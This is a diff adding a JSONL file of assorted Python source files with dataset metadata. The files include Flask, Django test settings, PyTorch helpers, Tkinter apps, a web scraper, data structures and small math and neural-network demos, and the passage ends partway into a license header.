diff --git "a/2560.jsonl" "b/2560.jsonl" new file mode 100644--- /dev/null +++ "b/2560.jsonl" @@ -0,0 +1,583 @@ +{"seq_id":"88163655","text":"\"\"\"types\"\"\"\nfrom flask import current_app as app, jsonify\n\nEventType = app.model.EventType\nThingType = app.model.ThingType\n\n@app.route('/types', methods=['GET'])\ndef list_types():\n event_types = [{'label': et.value, 'value': str(et)}\n for et in app.model.EventType]\n thing_types = [{'label': et.value, 'value': str(et)}\n for et in app.model.ThingType]\n return jsonify(event_types + thing_types), 200\n","sub_path":"routes/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"414337445","text":"# coding: utf-8\nfrom gensim import models\nfrom sklearn.decomposition import PCA\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\n\nfont_path = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\nfont_prop = FontProperties(fname=font_path)\nmatplotlib.rcParams['font.family'] = font_prop.get_name()\n\n\ndef draw_word_scatter(model, word, topn=30):\n \"\"\" 入力されたwordに似ている単語の分布図を描くためのメソッド \"\"\"\n\n # 似ている単語を求めるためにはGensim word2vecの以下の機能を利用\n # model.most_similar(word, topn=topn)\n words = [x[0] for x in sorted(model.most_similar(word, topn=topn))]\n words.append(word)\n\n # 各単語のベクトル表現を求めます。Gensimのmost_similarをベースとして\n # 単語のベクトルを返すメソッド(model.calc_vec)を定義しています\n vecs = [model[word] for word in words]\n\n # 分布図\n draw_scatter_plot(vecs, words)\n\ndef draw_scatter_plot(vecs, tags, clusters=None):\n \"\"\" 入力されたベクトルに基づき散布図(ラベル付き)を描くためのメソッド \"\"\"\n\n # Scikit-learnのPCAによる次元削減とその可視化\n pca = PCA(n_components=2)\n coords = pca.fit_transform(vecs)\n\n # matplotlibによる可視化\n fig, ax = plt.subplots()\n x = [v[0] for v in coords]\n y = [v[1] for v in coords]\n\n # 各点のクラスターが設定されていればクラスタを考慮\n if clusters:\n ax.scatter(x, y, c=clusters)\n else:\n ax.scatter(x, y)\n\n for i, txt in enumerate(tags):\n ax.annotate(txt, (coords[i][0], coords[i][1]))\n plt.show()\n\nif __name__ == \"__main__\":\n model = models.Doc2Vec.load('../model/doc2vec.model')\n draw_word_scatter(model, \"用心棒\", topn=40)\n \n","sub_path":"visualize/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"399412578","text":"from Tkinter import *\nimport pygame.mixer\n\nclass SoundPanel(Frame):\n\n def on_off(self):\n if self.tocando.get():\n #loops -1 = tocar pra sempre\n self.track.play(loops = -1)\n else:\n self.track.stop()\n\n def muda_volume(self, v):\n self.track.set_volume(self.volume.get())\n\n def __init__(self, app, mixer, sound_file):\n Frame.__init__(self, app)\n\n #http://www.pygame.org/docs/ref/mixer.html#pygame.mixer.Sound\n #cria um objeto de som, preferencialmente OGG ou WAV. 
suporte MP3 limitado\n self.track = mixer.Sound(sound_file)\n\n #cria uma variavel numerica pra ser setada no botao\n self.tocando = IntVar()\n\n #cria um botao de check pra definir on_off\n botaoTocar = Checkbutton(self, variable = self.tocando,\n command = self.on_off,\n text = sound_file)\n #posiciona o botao na tela\n botaoTocar.pack(side = RIGHT)\n\n #cria uma variavel numerica pra armazenar volume\n self.volume = DoubleVar()\n #define ela como o volume da faixa\n self.volume.set(self.track.get_volume())\n\n #cria um botao de escala pra definir volume\n escala = Scale(self, variable = self.volume,\n from_ = 0.0, to = 1.0, resolution = 0.1,\n command = self.muda_volume,\n label = 'Volume', orient = HORIZONTAL)\n #posiciona o botao na tela\n escala.pack(side = RIGHT)\n\n","sub_path":"sound_panel.py","file_name":"sound_panel.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"330708971","text":"from torch.autograd import Variable\r\nimport torch\r\nimport cv2\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n\r\n# validation test\r\ndef validation(model, vad_loader, criterion, device):\r\n vad_loss = 0\r\n vad_acc = 0\r\n for i, (images, labels) in enumerate(vad_loader):\r\n images = Variable(images).to(device)\r\n labels = Variable(labels).to(device)\r\n outputs = model(images)\r\n loss = criterion(outputs, labels)\r\n vad_loss += loss.item()\r\n outputs = torch.argmax(outputs, dim=1)\r\n vad_acc += (outputs == labels).float().mean()\r\n vad_loss = vad_loss / len(vad_loader)\r\n vad_acc = vad_acc / len(vad_loader)\r\n return vad_loss, vad_acc\r\n\r\n\r\n# draw acc graph\r\ndef draw_plot(train_accs, vad_accs, file_name, config):\r\n plt.plot(train_accs, label='Train Acc')\r\n plt.plot(vad_accs, label='Vad Acc')\r\n plt.legend(frameon=False)\r\n plt.savefig(config['model_save_path'] + '\\\\' + file_name + '.png')\r\n plt.show()\r\n\r\n\r\n# get class activation map\r\ndef return_cam(feature_conv, weight_softmax, class_idx):\r\n size_upsample = (128, 128)\r\n bz, nc, h, w = feature_conv.shape\r\n output_cam = []\r\n for idx in class_idx:\r\n cam = weight_softmax[class_idx].dot(feature_conv.reshape((nc, h*w)))\r\n cam = cam.reshape(h, w)\r\n cam = cam - np.min(cam)\r\n cam_img = cam/np.max(cam)\r\n cam_img = np.uint8(255 * cam_img)\r\n output_cam.append(cv2.resize(cam_img, size_upsample))\r\n return output_cam\r\n","sub_path":"model_util.py","file_name":"model_util.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"412247070","text":"# -*- coding: utf-8 -*-\nimport os\n\nimport gensim\nimport numpy as np\nimport tensorflow as tf\n\nfrom configuration.config import w2v_data_path\n\n\nclass Vocab(object):\n def __init__(self):\n w2v_model = gensim.models.KeyedVectors.load(os.path.join(w2v_data_path, \"w2v_word_py3_baidu_0810\"))\n vocab = w2v_model.vocab\n self.vocab_size = len(vocab)\n print(\"vocab_size: {}\".format(self.vocab_size))\n\n self.token2id = {w: idx for idx, w in enumerate(vocab)}\n self.id2token = {idx: w for w, idx in self.token2id.items()}\n self.token2embed = {w: w2v_model.word_vec(w) for idx, w in enumerate(vocab)}\n\n self.pad_token = \"\"\n self.token2id.update({self.pad_token: len(self.token2id)})\n self.id2token.update({self.token2id[self.pad_token]: self.pad_token})\n self.token2embed.update({self.pad_token: [0.0] * 150})\n self.vocab_size += 1\n\n 
self.unk_token = \"\"\n self.token2id.update({self.unk_token: len(self.token2id)})\n self.id2token.update({self.token2id[self.unk_token]: self.unk_token})\n self.token2embed.update({self.unk_token: [0.0] * 150})\n self.vocab_size += 1\n\n self.embed_dim = 150\n\n # self.embeddings = [self.token2embed[self.id2token[i]] for i in range(self.vocab_size)]\n self.PAD_ID = self.token2id[self.pad_token]\n self.UNK_ID = self.token2id[self.unk_token]\n\n with tf.device(\"/cpu:0\"), tf.variable_scope(\"word_embedding\", reuse=tf.AUTO_REUSE):\n self.word_embedding = tf.get_variable(\n \"word_embedding\",\n shape=(self.vocab_size, self.embed_dim),\n initializer=tf.constant_initializer(np.array([self.token2embed[self.id2token[i]] for i in range(self.vocab_size)], dtype=np.float32)),\n trainable=False)\n\n\nkelvin_word_vocab = Vocab()\n","sub_path":"vocab_old.py","file_name":"vocab_old.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"85492051","text":"#!/usr/bin/env python\n# encoding: utf-8\n# ===============================================================================\n#\n# FILE:\n#\n# USAGE:\n#\n# DESCRIPTION:\n#\n# OPTIONS: ---\n# REQUIREMENTS: ---\n# BUGS: ---\n# NOTES: ---\n# AUTHOR: YOUR NAME (),\n# COMPANY:\n# VERSION: 1.0\n# CREATED:\n# REVISION: ---\n# ===============================================================================\n\nfrom comm.decorator import count_run_time\n\n\n@count_run_time\ndef index_of_min(lyst: list):\n \"\"\"\n 3.3.1 搜索最小值\n\n :param lyst:\n :return:\n \"\"\"\n min_index = 0\n current_index = 1\n while current_index < len(lyst):\n if lyst[current_index] < lyst[min_index]:\n min_index = current_index\n current_index += 1\n return min_index\n\n\n@count_run_time\ndef index_of_max(lyst: list):\n \"\"\"\n 3.3.1 拓展 搜索最大值\n\n :param lyst:\n :return:\n \"\"\"\n max_index = 0\n current_index = 1\n while current_index < len(lyst):\n if lyst[current_index] > lyst[max_index]:\n max_index = current_index\n current_index += 1\n return max_index\n\n\n@count_run_time\ndef sequential_search(t, lyst: list):\n \"\"\"\n 3.3.2 顺序搜索一个列表\n\n :param t:\n :param lyst:\n :return:\n \"\"\"\n _p = 0\n while _p < len(lyst):\n if t == lyst[_p]:\n return _p\n _p += 1\n return -1\n\n\n@count_run_time\ndef binary_search(t, lyst: list):\n \"\"\"\n 3.3.4 二叉树搜索,要求列表是排序过的\n\n :param t:\n :param lyst:\n :return:\n \"\"\"\n print(t >= lyst[0])\n if t < lyst[0] or t > lyst[-1]:\n raise ValueError(\"%d <= t <= %d\" % (lyst[0], lyst[-1]))\n left = 0\n right = len(lyst) - 1\n _count = 1\n print(\"搜索开始,left = %d, right = %d\" % (left, right))\n while left <= right:\n print(\"第%d次搜索\" % _count)\n # 整除\n mid = (left + right) // 2\n print(\"中间数为%d,值为%d\" % (mid, lyst[mid]))\n if t == lyst[mid]:\n print(\"第%d次找到了%d\" % (_count, t))\n return mid\n elif t < lyst[mid]:\n right = mid - 1\n print(\"%d < %d, set right = %d (%d - 1)\" % (\n t, lyst[mid], right, mid))\n else:\n left = mid + 1\n print(\"%d > %d, set left = %d (%d + 1)\" % (\n t, lyst[mid], left, mid))\n _count += 1\n raise ValueError(\"lyst not sorted\")\n\n","sub_path":"chapter_03/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":2487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"583804422","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2021-10-21 15:25:27\n# @Author : iamwm\n\nfrom asyncio.streams import StreamReader, StreamWriter\n\nfrom amp.broker.queue 
import MessageQueue\n\n\nclass Connection:\n \"\"\"\n connection used by broker\n \"\"\"\n\n def __init__(\n self,\n name: str,\n reader: StreamReader,\n writer: StreamWriter,\n ) -> None:\n self.name = name\n self.reader = reader\n self.writer = writer\n self.queue_context = {}\n\n def bind_queue(self, queue: MessageQueue):\n \"\"\"\n bind a queue to consumer\n \"\"\"\n queue.add_consumer({self.name: self})\n self.queue_context.update({queue.name: queue})\n\n async def on_create(self):\n \"\"\"\n things to do on connection created\n \"\"\"\n response = f\"connection from:{self.name} created!\"\n print(response)\n self.writer.write(response.encode())\n await self.writer.drain()\n\n async def on_close(self):\n \"\"\"\n things to do on connection cloesed\n \"\"\"\n response = f\"connection from:{self.name} closed!\"\n print(response)\n for _, queue in self.queue_context.items():\n queue.remove_consumer(self.name)\n","sub_path":"amp/broker/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"544585127","text":"from src.randomOps.randItemFromList import randItemFromList\n\n\nclass randItemsFromList(randItemFromList):\n def __init__(self, array, n):\n self.array = array\n self.genItems = []\n self.n = n\n self.generateChoices()\n\n def generateItems(self):\n if self.n <= len(self.array):\n for i in range(self.n):\n super().genItem()\n self.genItems.append(super().getItem())\n self.array.remove(super().getItem())\n else:\n self.genItems = \"ERROR: n is larger than array size\"\n\n def getItems(self):\n return self.genItems\n","sub_path":"src/randomOps/randItemsFromList.py","file_name":"randItemsFromList.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"211834414","text":"from __future__ import print_function\nimport os\nfrom collections import OrderedDict\nimport re\n\n\ndef makeFolder(folder):\n if os.path.exists(folder):\n pass\n else:\n os.makedirs(folder)\n\n\n# MAIN BELOW\n\n# Remember to change directory\nos.chdir(\"/Volumes/3Projects/OVMM-OhioVetMem/02_CONTENT/Exhibit Script_FINAL/Thematic Displays/\")\n\nwith open(\"_TH2ndCap.txt\", 'rU') as readFile: #.txt file\n inputTextList = readFile.readlines() #Returns a list\n\nwith open(\"_TH2ndCap_Credits.txt\", 'rU') as readFile: #.txt file\n inputCreditList = readFile.readlines() #Returns a list \n\n# Clean up inputTextList: get rid of empty items (eg. 
only newlines and spaces & newline)\ninputTextList = [text for text in inputTextList if text != \"\\n\" and not re.match(r\" +\\n\", text)]\n\n# Generate a list of where content codes appear\ncodeIndex = [index for index, entry in enumerate(inputTextList) if \"_\" in entry]\ncodeIndex.append(len(inputTextList))\n\n# creditDict is {gNumber : credit}\ncreditDict = {item.split(\"\\t\")[0] : item.split(\"\\t\")[1] for item in inputCreditList}\n\n# contentDict is {content code : list of captions}\ncontentDict = {inputTextList[codeIndex[i]].replace(\"\\n\", \"\").split(\" \")[0] :\\\n inputTextList[codeIndex[i]+1:codeIndex[i+1]] for i in range(len(codeIndex)-1)}\n\ncontentDict = OrderedDict(sorted(contentDict.items()))\n\ngNumDict = {}\ncapStarterDict = {}\n\n# Generate a dict of gNums and a dict of cap starter indices\n# gNumDict is {content code : list of gNums}\n# capStarterDict is {content code : list of indices}\nfor key in contentDict:\n gNumList = []\n capStarterIndex = []\n\n for index, item in enumerate(contentDict[key]):\n # This is g number: log it \n if re.match(r\"g\\d+\", item.lower()):\n gNumList.append(item[0:5]) # Don't include trailing newspace\n \n # This is caption starter: log its place\n elif \" \" in item:\n capStarterIndex.append(index)\n \n gNumDict[key] = gNumList\n capStarterDict[key] = capStarterIndex\n\ngNumDict = OrderedDict(sorted(gNumDict.items()))\ncapStarterDict = OrderedDict(sorted(capStarterDict.items()))\n\n# Get rid of newlines in credits\n# for key in creditDict:\n# if creditDict[key][-1] == \"\\n\":\n# creditDict[key] = creditDict[key][0:-1]\n\n# Empty this file\ncomboText = \"_TH_CAPS_combo.txt\"\nwith open(comboText, \"w+\") as comboFile:\n comboFile.write(\"\")\n\n# Iterate over contentDict to generate textblocks\n# and write files\nfor key in contentDict:\n capStarters = capStarterDict[key]\n gNums = gNumDict[key]\n\n # Generate clean captions for per caption group\n captionBlock = \"\"\n if not capStarters:\n captionBlock = contentDict[key][1] + \"\\n\"\n\n elif len(capStarters) < 2:\n for i in range(1, len(contentDict[key]) + 1, 2):\n captionBlock += contentDict[key][i] + \"\\n\"\n\n # captionBlock += \"\\n\"\n\n else:\n for i in range(len(capStarters)):\n start = capStarters[i]\n\n # Quick fix to circumvent IndexError (when end = i+1)\n if capStarters[i] == capStarters[-1]:\n end = len(contentDict[key])\n else:\n end = capStarters[i + 1]\n\n for j in range(start, end, 2):\n captionBlock += contentDict[key][j] + \"\\n\"\n\n captionBlock += \"\\n\"\n \n # Generate a list of credits per caption group\n creditList = []\n for gNum in gNumDict[key]:\n try:\n creditList.append(creditDict[gNum.lower()])\n \n except KeyError:\n creditList.append(\"Missing credit for {}\".format(gNum))\n \n # Get rid of credits that end in and empty space & strip quote marks\n creditList = [credit[:-1].strip('\"') if credit[-1] == \" \" else credit.strip('\"') for credit in creditList]\n\n # Generate semicolon-separated credits per caption group\n creditBlock = (\"; \".join(creditList))\n\n\n # Finally write some files\n # pathName = \"TH/CAPS/\"\n\n # makeFolder(pathName)\n\n # captionPath = os.path.join(pathName, key.upper() + \".txt\")\n\n # with open(captionPath, \"w\") as captionFile:\n # captionFile.write(captionBlock)\n # captionFile.write(\"\\n\" + creditBlock)\n\n\n # Append to combo file:\n with open(comboText, \"a+\") as comboFile:\n comboFile.write(\"------------\\n\" + key.upper() + \"\\n------------\\n\\n\")\n comboFile.write(\", \".join(gNums) + 
\"\\n\\n\\n\")\n comboFile.write(captionBlock + \"----------\\n\\n\")\n comboFile.write(creditBlock)\n comboFile.write(\"\\n\\n------------------------------------------------------------\\n\\n\")\n\n print(\"File {}.txt written\".format(key))\n ","sub_path":"contentSeparator/contentSeparatorCaptionsTH.py","file_name":"contentSeparatorCaptionsTH.py","file_ext":"py","file_size_in_byte":4632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"461271879","text":"# Django settings for example project.\nimport os\nfrom decimal import Decimal\nDEBUG = True\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': ':memory:', # Or path to database file if using sqlite3.\n 'USER': '', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\nTIME_ZONE = 'America/Chicago'\nUSE_TZ = True\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = True\nUSE_L10N = True\nMEDIA_ROOT = ''\nMEDIA_URL = ''\nSTATIC_ROOT = ''\nSTATIC_URL = '/static/'\n\n\nSECRET_KEY = 'l#^#iad$8$4=dlh74$!xs=3g4jb(&j+y6*ozy&8k1-&d+vruzy'\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'django.middleware.locale.LocaleMiddleware',\n)\n\nROOT_URLCONF = 'plans.urls'\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'ordered_model',\n 'plans',\n\n)\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'APP_DIRS': True,\n 'DIRS': [],\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n # django-plans context processor\n 'plans.context_processors.account_status',\n ],\n },\n },\n]\n\n\nLANGUAGES = (\n ('en', 'English'),\n ('pt_BR', 'Portuguese'),\n)\n\nPLANS_INVOICE_ISSUER = {\n \"issuer_name\": \"My Company Ltd\",\n \"issuer_street\": \"48th Suny street\",\n \"issuer_zipcode\": \"111-456\",\n \"issuer_city\": \"Django City\",\n \"issuer_country\": \"PL\",\n \"issuer_tax_number\": \"PL123456789\",\n}\n\nPLANS_TAX = Decimal('23.0')\nPLANS_TAXATION_POLICY = 'plans.taxation.eu.EUTaxationPolicy'\nPLANS_TAX_COUNTRY = 'PL'\n\nPLANS_VALIDATORS = {}\n\nPLANS_CURRENCY = 'EUR'\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\n\nLOGIN_REDIRECT_URL = '/foo/list/'","sub_path":"test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"246045630","text":"import tkinter as tk\nfrom tkinter import ttk \nimport 
requests\nfrom bs4 import BeautifulSoup\n\napp = tk.Tk()\napp.title('Парсер habr.com')\n\nsearch_label = ttk.Label(app, text='Введите количество постов: ')\nsearch_label.grid(row =0, column=0)\n\ntext_field = ttk.Entry(app, width=70)\ntext_field.grid(row=1, column=0)\n\ndef search():\n if text_field.get().strip() !=\"\":\n count = int(text_field.get())\n parse_page = ''\n\n if count % 20 == 0:\n pages_to_parse = count//20\n else:\n pages_to_parse = count//20 + 1\n\n for i in range (1, pages_to_parse+1):\n url = 'https://habr.com/ru/top/yearly/page' + str(i)\n r = requests.get(url)\n parse_page += r.text.replace('', '')\n\n soup = BeautifulSoup(parse_page, 'lxml')\n\n for i in range (0, count):\n post_title = soup.find_all('a', class_='post__title_link')[i].text\n post_text = BeautifulSoup(str(soup.find_all('div', class_='post__text')[i]).replace('
','').replace('\\r\\n',' ').replace('\\n',' '),'lxml').text\n post_date = soup.find_all('span', class_='post__time')[i].text\n post_author = soup.find_all('span', class_='user-info__nickname')[i].text\n\n file = open('habr.csv', 'a')\n file.write(post_title + ';')\n file.write(post_text + ';')\n file.write(post_date + ';')\n file.write(post_author + '\\n')\n file.close()\n\ndef enterBtn(event):\n search()\n\ndef searchBtn():\n search()\n\nbtn_search = ttk.Button(app, text=\"Найти\", width= 10, command=searchBtn)\nbtn_search.grid(row=1, column=1)\n\ntext_field.bind('', enterBtn)\n\napp.wm_attributes('-topmost', True)\n\napp.mainloop()\n","sub_path":"TkinterHabr.py","file_name":"TkinterHabr.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"176443702","text":"import json,requests\nimport global_vars as gv\nclass delete_gist :\n def __init__(self):\n self.headers=gv.headers\n def del_gist(self,gist_id):\n self.url='https://api.github.com/gists/'+gist_id\n req=requests.delete(self.url,headers=self.headers)\n if(req.status_code==204):\n print(\"succesfully deleted\")\n else:\n print(\"unsuccessful error code is \")\n print(req.status_code)\n\n","sub_path":"mygist/delete_gist.py","file_name":"delete_gist.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"344911757","text":"from DoublyLinkedNode import DoublyLinkedNode\n\nclass DoublyLinkedList:\n\n #implements the ADT List (List.py)\n #uses the DoublyLinkedNode class (DoublyLinkedNode.py)\n\n def __init__( self ):\n self._head = DoublyLinkedNode( None, None, None )\n self._trail = DoublyLinkedNode( None, None, None )\n self._head.next = self._trail\n self._trail.prev = self._head\n self._size = 0\n\n def __len__( self ):\n return self._size\n\n def __str__( self ):\n if self.is_empty():\n return \"[](size = 0)\"\n else:\n pp = \"[\"\n curr = self._head.next\n while curr.next != self._trail:\n pp += str( curr.element ) + \", \"\n curr = curr.next\n pp += str( curr.element ) + \"]\"\n pp += \"(size = \" + str( self._size ) + \")\"\n return pp\n\n def is_empty( self ):\n return self._size == 0\n\n def append( self, element ):\n newNode = DoublyLinkedNode( element, self._trail.prev, self._trail )\n self._trail.prev.next = newNode\n self._trail.prev = newNode\n self._size += 1\n\n def insert( self, element ):\n newNode = DoublyLinkedNode( element, self._head, self._head.next )\n self._head.next.prev = newNode\n self._head.next = newNode\n self._size += 1\n\n def remove( self, k ):\n if self.is_empty():\n return False\n elif k <= 0 or k > self._size:\n return False\n else:\n curr = self._head.next\n for i in range( k - 1 ):\n curr = curr.next\n curr.prev.next = curr.next\n curr.next.prev = curr.prev\n self._size -= 1\n return curr.element\n\n def find( self, element ):\n if self.is_empty():\n return False\n else:\n curr = self._head.next\n for i in range( self._size ):\n if curr.element == element:\n return i + 1\n else:\n curr = curr.next\n\n def last( self ):\n if self.is_empty():\n return False\n else:\n return self._trail.prev.element\n\n def first( self ):\n if self.is_empty():\n return False\n else:\n return self._head.next.element\n\n\"\"\"unit testing\n\"\"\"\nif __name__ == '__main__':\n\n data = DoublyLinkedList()\n print( data )\n\n data.append( 'titi' )\n data.append( 'toto' )\n data.append( 'tata' )\n print( data )\n\n idx = data.find( 'titi' 
)\n if idx:\n print( \"found titi ranked\", idx )\n else:\n print( \"titi not found\" )\n idx = data.find( 'cece' )\n if idx:\n print( \"found cece ranked\", idx )\n else:\n print( \"cece not found\" )\n\n print( \"remove 1 =\", data.remove( 1 ) )\n print( \"new size = \", str( len( data ) ) )\n print( data )\n print( \"remove 2 = \", data.remove( 2 ) )\n print( data )\n print( \"remove 1 = \", data.remove( 1 ) )\n print( data )\n print( \"remove 1 = \", data.remove( 1 ) )\n print( data )\n\n data.append( 'titi' )\n data.append( 'toto' )\n data.append( 'tata' )\n data.append( 'hala' )\n data.append( 'asma' )\n print( data )\n\n idx = data.find( 'titi' )\n if idx:\n print( \"found titi ranked\", idx )\n else:\n print( \"titi not found\" )\n idx = data.find( 'cece' )\n if idx:\n print( \"found cece ranked\", idx )\n else:\n print( \"cece not found\" )\n\n print( \"remove 3 =\", data.remove( 3 ) )\n print( \"new size = \", str( len( data ) ) )\n print( data )\n \n\n \n \n","sub_path":"weekly_classes/05-LISTES/DoublyLinkedList.py","file_name":"DoublyLinkedList.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"72086900","text":"# python lesson hw01-1\n# 2018/10/05\n\nfrom decimal import Decimal as dec\n\nmoney = dec(input(\"本金:\"))\nrate = dec(input(\"利率:\"))\nyears = dec(input(\"存幾年:\"))\n\nprint(\"和: {}\".format(money*(1+rate)**years))","sub_path":"hw01-1.py","file_name":"hw01-1.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"19419685","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 27 11:15:54 2018\n\n@author: Mehdi Senoussi\n\"\"\"\nimport numpy as np\nimport time\nfrom course_functions import plot_network, update_network\n\ntimesleep = .2\nn_tsteps = 100\ntimes = np.arange(n_tsteps)\nt = 1\n# output units\nydog = np.zeros(n_tsteps)\nycat = np.zeros(n_tsteps)\nincat = np.zeros(n_tsteps)\nindog = np.zeros(n_tsteps)\n# std of noise\nsigma = .25\n# learning rate\nalpha = .2\n\n#\nlayers = np.array([1, 1, 1, 2, 2])\nn_units = len(layers)\nactivations = np.array([1., 0., 0., 0., 0.])\nweights = np.zeros(shape=[n_units, n_units])\n\n# setting up weights for the cat-dog detector; note example is different from in book.\nweights[0, 3] = .4 # cats often bite visitors\nweights[0, 4] = .1 # dogs rarely bite visitors\nweights[1, 3] = .2 # cats often have four legs\nweights[1, 4] = .2 # dogs often have four legs\nweights[2, 3] = .1 # cats rarely have their pictures on FB\nweights[2, 4] = .4 # dogs often have their pictures on FB\nweights[3, 4] = -.2 # a cat cannot be a dog, and vice versa\n\n# computing the initial y activation values\nincat = weights[0, 3] * activations[0] + weights[1, 3] * activations[1] + weights[2, 3] * activations[2]\nindog = weights[0, 4] * activations[0] + weights[1, 4] * activations[1] + weights[2, 4] * activations[2]\nycat[t] = ycat[t-1] + alpha * (incat + weights[3, 4] * ydog[t-1]) + np.random.randn()*sigma\nydog[t] = ydog[t-1] + alpha * (indog + weights[3, 4] * ycat[t-1]) + np.random.randn()*sigma\nactivations[3:] = [ycat[t], ydog[t]]\nenergy = -incat*ycat[t] - indog*ydog[t] - weights[3, 4]*ycat[t]*ydog[t]\n\nfig, axs, texts_handles, lines_handles, unit_pos =\\\n plot_network(figsize = [13, 7], activations = activations,\n weights = weights, layers = layers, energy = energy)\n\n\nfor t in times[1:]:\n ycat[t] = ycat[t-1] + alpha * (incat + 
weights[3, 4] * ydog[t-1]) + np.random.randn()*sigma\n ydog[t] = ydog[t-1] + alpha * (indog + weights[3, 4] * ycat[t-1]) + np.random.randn()*sigma\n if ycat[t]<0 : ycat[t] = 0\n if ydog[t]<0: ydog[t] = 0\n activations[3:] = [ycat[t], ydog[t]]\n energy = -incat*ycat[t] - indog*ydog[t] - weights[3, 4]*ycat[t]*ydog[t]\n \n update_network(fig = fig, axs = axs, texts_handles = texts_handles,\n lines_handles = lines_handles, activations = activations,\n unit_pos = unit_pos, weights = weights, layers = layers, change = 0,\n cycle = t, energy = energy)\n\n time.sleep(timesleep)\n\n\n","sub_path":"AY 2018 - 2019/ch2_example_network_cat_dog.py","file_name":"ch2_example_network_cat_dog.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"422029929","text":"Mod = 1000000007\n\ndef fastpow(a,b,modu):\n ans = 1\n while b > 0:\n if (b & 1): ans = (ans * a) % modu\n a = (a * a) % modu\n b >>= 1\n return ans\n\n\nMaxN = 1000005\n\nfac = [1 for _ in range(MaxN)]\nifac = [1 for _ in range(MaxN)]\n\n\nfor i in range(1,MaxN):\n fac[i] = (fac[i - 1]*i) % Mod\n\nifac[MaxN - 1] = fastpow(fac[MaxN - 1],Mod - 2,Mod)\nfor i in range(MaxN - 2,-1,-1):\n ifac[i] = ((i + 1)*ifac[i + 1]) % Mod\n\n\n\ndef C(r,n):\n global Mod\n global fac\n global ifac\n ans = fac[n]\n ans = (ans*ifac[r]) % Mod\n ans = (ans*ifac[n - r]) % Mod\n return ans\n\nif __name__ == '__main__':\n\n n = int(input())\n for _ in range(n):\n a, b = map(int,input().split())\n print(C(b,a))\n","sub_path":"CSES/Mathematics/Task1079.py","file_name":"Task1079.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"478004181","text":"# Copyright 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 